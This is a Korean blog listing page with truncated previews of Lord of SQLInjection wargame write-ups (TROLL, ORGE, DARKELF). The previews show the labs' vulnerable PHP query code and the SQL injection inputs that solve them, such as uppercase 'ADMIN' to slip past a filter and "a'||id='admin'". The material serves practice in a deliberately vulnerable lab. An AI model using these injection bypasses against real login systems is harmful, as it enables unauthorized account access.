반응형 [웹해킹]/[LOS]24 [LOS] TROLL query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id'] == 'admin') solve("troll"); highlight_file(__FILE__);?> MySQL의 VARCHAR, CHAR, TEXT 형식은 기본적으로 대소문자를 구분하지 않는다.tomining.tistory.com/179 admin이 소문자로만 preg_match로 필터링되어있으니 대문자로 ADMIN을 넣으면 풀린다.query : select id from prob_troll where id='ADMIN' 2020. 12. 13. [LOS] ORGE query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); highlight_file(__FILE__.. 2020. 12. 13. [LOS] DARKELF query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("darkelf"); highlight_file(__FILE__); ?>or 필터링이라 || 사용. query : select id from prob_darkelf where id='guest' and pw='a'||id='admin' 2020. 12. 13. [LOS] WOLFMAN 소스 2020. 12. 12. 이전 1 2 3 4 5 6 다음 반응형
